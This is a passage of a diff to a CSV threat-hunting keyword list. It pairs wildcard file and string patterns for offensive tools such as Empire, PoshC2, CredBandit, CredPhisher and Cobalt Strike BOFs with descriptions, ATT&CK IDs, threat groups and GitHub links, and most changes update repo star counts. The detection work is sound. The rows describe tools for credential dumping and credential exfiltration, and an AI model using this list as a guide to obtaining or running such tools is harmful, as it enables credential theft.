+"*createproxypayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Create-SuspendedWinLogon*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Create-WinLogonProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*credBandit * output*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","0","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*credBandit.*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" 
"*credBanditx64*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" -"*creddump.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*Credential Guard bypass might fail if RunAsPPL is enabled*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*creddump.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Credential Guard bypass might fail if RunAsPPL is enabled*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*CredentialAccess_CredentialDumping_BrowserDataCSharp.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialDumping_KiwiOnLocal.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - 
T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialDumping_SunLogin.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
@@ -8856,34 +9004,34 @@
 "*CredentialAccess_CredentialInFiles_WindowsSoftware.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*Credentials Found in Configurations!*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z"
-"*Credentials*hekatomb_*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*Credentials*hekatomb_*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
 "*Credentials/CacheDump.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
-"*Credentials/certsync_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*Credentials/certsync_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
 "*Credentials/LSASecrets.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
-"*Credentials/SAMDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
-"*CredPhisher.csproj*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
-"*CredPhisher.exe*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*Credentials/SAMDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*CredPhisher.csproj*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*CredPhisher.exe*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*credphisher.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
-"*cred-popper *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
-"*CredPrompt/CredPrompt.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z"
+"*cred-popper *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*CredPrompt/CredPrompt.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z"
 "*creds_hunt.exe*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","",""
 "*CredsLeaker*","offensive_tool_keyword","CredsLeaker","This script used to display a powershell credentials box asked the user for credentials. However. That was highly noticeable. Now its time to utilize Windows Security popup!","T1087 - T1056 - T1003 - T1059 - T1110","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/Dviros/CredsLeaker","1","1","N/A","N/A","3","295","73","2021-03-31T11:49:57Z","2018-03-05T07:53:31Z"
 "*CredsPhish.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
-"*Credz-Plz.ps1*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
-"*Credz-Plz-Execute.txt*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Credz-Plz.ps1*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Credz-Plz-Execute.txt*","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*cribdragg3r/Alaris*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" "*crimeware*/zeus.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 